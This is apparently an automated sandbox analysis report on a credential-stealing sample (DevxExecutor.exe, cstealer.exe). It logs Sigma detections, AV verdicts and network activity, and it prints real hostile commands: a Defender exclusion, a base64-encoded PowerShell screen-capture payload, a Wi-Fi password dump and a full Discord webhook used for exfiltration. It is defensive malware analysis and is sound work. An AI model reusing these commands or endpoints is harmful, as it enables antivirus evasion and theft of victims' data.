                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\ProgramData\Microsoft\based.exe" , ParentImage: C:\ProgramData\Microsoft\based.exe, ParentProcessId: 4292, ParentProcessName: based.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'", ProcessId: 4128, ProcessName: cmd.exe
                                Sigma detected: SCR File Write Event
                                Source: File createdAuthor: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\ProgramData\Microsoft\based.exe, ProcessId: 4292, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ??.scr
                                Sigma detected: Startup Folder File Write
                                Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\ProgramData\Microsoft\based.exe, ProcessId: 4292, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
                                Sigma detected: Suspicious Execution of Powershell with Base64
                                Source: Process startedAuthor: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
                                Sigma detected: Suspicious Screensaver Binary File Creation
                                Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\ProgramData\Microsoft\based.exe, ProcessId: 4292, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ??.scr
                                Sigma detected: Uncommon Svchost Parent Process
                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\ProgramData\svchost.exe" , CommandLine: "C:\ProgramData\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\ProgramData\svchost.exe, NewProcessName: C:\ProgramData\svchost.exe, OriginalFileName: C:\ProgramData\svchost.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe -pbeznogym, ParentImage: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe, ParentProcessId: 6728, ParentProcessName: s.exe, ProcessCommandLine: "C:\ProgramData\svchost.exe" , ProcessId: 8076, ProcessName: svchost.exe
                                Sigma detected: Dynamic CSharp Compile Artefact
                                Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 8824, TargetFilename: C:\Users\user\AppData\Local\Temp\zcrbnhje\zcrbnhje.cmdline
                                Sigma detected: Non Interactive PowerShell Process Spawned
                                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe', CommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe', CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4128, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe', ProcessId: 6628, ProcessName: powershell.exe
                                Sigma detected: Windows Processes Suspicious Parent Directory
                                Source: Process startedAuthor: vburov: Data: Command: "C:\ProgramData\svchost.exe" , CommandLine: "C:\ProgramData\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\ProgramData\svchost.exe, NewProcessName: C:\ProgramData\svchost.exe, OriginalFileName: C:\ProgramData\svchost.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe -pbeznogym, ParentImage: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe, ParentProcessId: 6728, ParentProcessName: s.exe, ProcessCommandLine: "C:\ProgramData\svchost.exe" , ProcessId: 8076, ProcessName: svchost.exe

                                Stealing of Sensitive Information

                                barindex
                                Sigma detected: Capture Wi-Fi password
                                Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\ProgramData\Microsoft\based.exe" , ParentImage: C:\ProgramData\Microsoft\based.exe, ParentProcessId: 4292, ParentProcessName: based.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", ProcessId: 3780, ProcessName: cmd.exe

                                Snort Signatures

                                No Snort rule has matched

                                Joe Sandbox Signatures

                                Click to jump to signature section

                                Show All Signature Results

                                AV Detection

                                barindex
                                Antivirus / Scanner detection for submitted sample
                                Source: DevxExecutor.exeAvira: detected
                                Antivirus detection for URL or domain
                                Source: https://superfurrycdn.nl/copy/Avira URL Cloud: Label: malware
                                Source: https://rentry.co/5uu99/rawAvira URL Cloud: Label: malware
                                Antivirus detection for dropped file
                                Source: C:\ProgramData\main.exeAvira: detection malicious, Label: TR/Spy.KeyLogger.kapbl
                                Source: C:\ProgramData\setup.exeAvira: detection malicious, Label: TR/CoinMiner.lnxah
                                Source: C:\Program Files\Google\Chrome\updater.exeAvira: detection malicious, Label: TR/CoinMiner.lnxah
                                Multi AV Scanner detection for domain / URL
                                Source: https://superfurrycdn.nl/copy/Virustotal: Detection: 10%Perma Link
                                Source: https://rentry.co/u4tup/rawVirustotal: Detection: 7%Perma Link
                                Multi AV Scanner detection for dropped file
                                Source: C:\Program Files\Google\Chrome\updater.exeReversingLabs: Detection: 71%
                                Source: C:\ProgramData\Microsoft\based.exeReversingLabs: Detection: 47%
                                Source: C:\ProgramData\Microsoft\hacn.exeReversingLabs: Detection: 45%
                                Source: C:\ProgramData\main.exeReversingLabs: Detection: 65%
                                Source: C:\ProgramData\setup.exeReversingLabs: Detection: 71%
                                Source: C:\ProgramData\svchost.exeReversingLabs: Detection: 41%
                                Multi AV Scanner detection for submitted file
                                Source: DevxExecutor.exeReversingLabs: Detection: 52%
                                Source: DevxExecutor.exeVirustotal: Detection: 53%Perma Link
                                Machine Learning detection for dropped file
                                Source: C:\ProgramData\main.exeJoe Sandbox ML: detected
                                Source: C:\ProgramData\Microsoft\hacn.exeJoe Sandbox ML: detected
                                Source: C:\ProgramData\setup.exeJoe Sandbox ML: detected
                                Source: C:\ProgramData\svchost.exeJoe Sandbox ML: detected
                                Source: C:\ProgramData\Microsoft\based.exeJoe Sandbox ML: detected
                                Source: C:\Program Files\Google\Chrome\updater.exeJoe Sandbox ML: detected
                                Machine Learning detection for sample
                                Source: DevxExecutor.exeJoe Sandbox ML: detected
                                Source: DevxExecutor.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.5:49718 version: TLS 1.2
                                Source: DevxExecutor.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                Source: Binary string: D:\_w\1\b\bin\amd64\_lzma.pdbNN source: cstealer.exe, 00000002.00000003.2161593775.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000007.00000003.2188225696.0000014E6F9D3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2544890205.00007FF8B814C000.00000002.00000001.01000000.00000022.sdmp
                                Source: Binary string: D:\_w\1\b\bin\amd64\select.pdb source: cstealer.exe, 00000002.00000003.2167136670.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000007.00000003.2193894661.0000014E6F9D4000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2549694907.00007FF8B8833000.00000002.00000001.01000000.00000028.sdmp
                                Source: Binary string: D:\_w\1\b\bin\amd64\sqlite3.pdb source: cstealer.exe, 00000009.00000002.2451739427.00007FF8A7ECA000.00000002.00000001.01000000.00000032.sdmp
                                Source: Binary string: D:\_w\1\b\bin\amd64\_ctypes.pdb source: cstealer.exe, 00000009.00000002.2556408561.00007FF8B90E0000.00000002.00000001.01000000.0000001E.sdmp
                                Source: Binary string: D:\_w\1\b\bin\amd64\_sqlite3.pdb source: cstealer.exe, 00000009.00000002.2532242365.00007FF8B7E3E000.00000002.00000001.01000000.00000031.sdmp
                                Source: Binary string: D:\_w\1\b\libssl-1_1.pdb source: cstealer.exe, 00000009.00000002.2537892157.00007FF8B80A6000.00000002.00000001.01000000.0000002A.sdmp
                                Source: Binary string: D:\_w\1\b\bin\amd64\_bz2.pdb source: cstealer.exe, 00000002.00000003.2161069601.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000007.00000003.2187624587.0000014E6F9D2000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2551384631.00007FF8B90AD000.00000002.00000001.01000000.00000020.sdmp, cstealer.exe, 00000049.00000003.2467259696.000001DB63733000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\_w\1\b\libssl-1_1.pdb@@ source: cstealer.exe, 00000009.00000002.2537892157.00007FF8B80A6000.00000002.00000001.01000000.0000002A.sdmp
                                Source: Binary string: D:\_w\1\b\bin\amd64\_socket.pdb source: cstealer.exe, 00000002.00000003.2161792548.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000007.00000003.2188566786.0000014E6F9D3000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\_work\1\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: cstealer.exe, 00000002.00000003.2160955520.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2186856638.000002004DDF3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000007.00000003.2187476154.0000014E6F9D2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000008.00000002.2223968322.00007FF8BA251000.00000002.00000001.01000000.0000001B.sdmp, cstealer.exe, 00000009.00000002.2558162642.00007FF8B9101000.00000002.00000001.01000000.0000001D.sdmp
                                Source: Binary string: D:\_w\1\b\bin\amd64\_queue.pdb source: cstealer.exe, 00000002.00000003.2161715742.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000007.00000003.2188481865.0000014E6F9D3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2548484415.00007FF8B8793000.00000002.00000001.01000000.0000002D.sdmp
                                Source: Binary string: D:\_w\1\b\bin\amd64\_ssl.pdb source: cstealer.exe, 00000009.00000002.2540558545.00007FF8B80ED000.00000002.00000001.01000000.00000029.sdmp
                                Source: Binary string: D:\_w\1\b\bin\amd64\unicodedata.pdb source: cstealer.exe, 00000002.00000003.2167928555.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000007.00000003.2194731679.0000014E6F9D4000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2454876358.00007FF8A8020000.00000002.00000001.01000000.00000030.sdmp
                                Source: Binary string: D:\_w\1\b\bin\amd64\_hashlib.pdb source: cstealer.exe, 00000002.00000003.2161490405.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000007.00000003.2188096980.0000014E6F9D3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2536033958.00007FF8B8017000.00000002.00000001.01000000.0000002C.sdmp
                                Source: Binary string: D:\_w\1\b\bin\amd64\_lzma.pdb source: cstealer.exe, 00000002.00000003.2161593775.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000007.00000003.2188225696.0000014E6F9D3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2544890205.00007FF8B814C000.00000002.00000001.01000000.00000022.sdmp
                                Source: Binary string: D:\_w\1\b\bin\amd64\python311.pdb source: main.exe, 00000008.00000002.2222098181.00007FF8A8CCB000.00000040.00000001.01000000.0000001A.sdmp, cstealer.exe, 00000009.00000002.2497830571.00007FF8A86FB000.00000002.00000001.01000000.0000001C.sdmp
                                Source: Binary string: D:\_w\1\b\libcrypto-1_1.pdb source: cstealer.exe, 00000009.00000002.2476831702.00007FF8A8300000.00000002.00000001.01000000.0000002B.sdmp
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00000271DC67DCE0 FindFirstFileExW,3_2_00000271DC67DCE0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF6957E8D00 FindFirstFileExW,FindClose,3_2_00007FF6957E8D00
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF6958026C4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,3_2_00007FF6958026C4
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF6957F8670 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,3_2_00007FF6957F8670
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF6957F8670 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,3_2_00007FF6957F8670
                                Source: C:\Users\user\AppData\Local\Temp\main.exeCode function: 4_2_00007FF6D6EA8670 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,4_2_00007FF6D6EA8670
                                Source: C:\Users\user\AppData\Local\Temp\main.exeCode function: 4_2_00007FF6D6E98D00 FindFirstFileExW,FindClose,4_2_00007FF6D6E98D00
                                Source: C:\Users\user\AppData\Local\Temp\main.exeCode function: 4_2_00007FF6D6EA8670 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,4_2_00007FF6D6EA8670
                                Source: C:\Users\user\AppData\Local\Temp\main.exeCode function: 4_2_00007FF6D6EB26C4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,4_2_00007FF6D6EB26C4
                                Source: C:\Windows\System32\cmd.exeCode function: 5_2_00000230D921DCE0 FindFirstFileExW,5_2_00000230D921DCE0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 7_2_0000014E7128DCE0 FindFirstFileExW,7_2_0000014E7128DCE0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A8033229 _errno,malloc,_errno,memset,MultiByteToWideChar,GetLastError,MultiByteToWideChar,MultiByteToWideChar,free,_errno,FindFirstFileW,_errno,FindNextFileW,WideCharToMultiByte,9_2_00007FF8A8033229
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css

                                Networking

                                barindex
                                Uses the Telegram API (likely for C&C communication)
                                Source: unknownDNS query: name: api.telegram.org
                                Source: global trafficHTTP traffic detected: GET /attationin/Cloud/main/Milinfo.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                                Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                                Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                                Source: Joe Sandbox ViewIP Address: 162.159.138.232 162.159.138.232
                                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                                Source: unknownDNS query: name: ip-api.com
                                Source: unknownDNS query: name: ip-api.com
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: global trafficHTTP traffic detected: GET /attationin/Cloud/main/Milinfo.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.2.1
                                Source: global trafficDNS traffic detected: DNS query: ip-api.com
                                Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
                                Source: global trafficDNS traffic detected: DNS query: discord.com
                                Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                                Source: unknownHTTP traffic detected: POST /api/webhooks/1237846362008195163/ZDvWlv-CgO7k2ie63UbKQjPqKJJV4I85cFC7RbPTP5wjqCUsjdPQ1Te7Pa_y0P8C8O0P HTTP/1.1Host: discord.comAccept-Encoding: identityContent-Length: 689192User-Agent: python-urllib3/2.2.1Content-Type: multipart/form-data; boundary=47ab1338cc3a5d235f5896f1843d1118
                                Source: cstealer.exe, 00000003.00000003.2183488711.00000271DA11F000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2700205546.00000271DA8A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2386235093.0000020103570000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://.../back.jpeg
                                Source: cstealer.exe, 00000002.00000003.2164160574.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000007.00000003.2191097529.0000014E6F9D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                                Source: cstealer.exe, 00000002.00000003.2167396035.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161168267.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161792548.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2162061027.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161917908.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161593775.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2163418436.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2164299642.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161319049.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2167928555.0000024728BA0000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161069601.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2167136670.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2164969586.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161715742.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161490405.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2167928555.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2187745990.000002004DDF3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2189591439.000002004DDFF000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2187611110.000002004DDF3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2187521128.000002004DDF3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2189188188.000002004DDF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                                Source: cstealer.exe, 00000002.00000003.2164160574.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000007.00000003.2191097529.0000014E6F9D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertS
                                Source: cstealer.exe, 00000002.00000003.2164160574.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000007.00000003.2191097529.0000014E6F9D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                                Source: cstealer.exe, 00000002.00000003.2164160574.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000007.00000003.2191097529.0000014E6F9D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                                Source: cstealer.exe, 00000007.00000003.2191097529.0000014E6F9D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSO
                                Source: cstealer.exe, 00000002.00000003.2167396035.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161168267.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161792548.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2162061027.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161917908.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161593775.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2163418436.0000024728B9E000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2164299642.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161319049.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161069601.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2167136670.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2164969586.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161715742.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161490405.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2167928555.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2187745990.000002004DDF3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 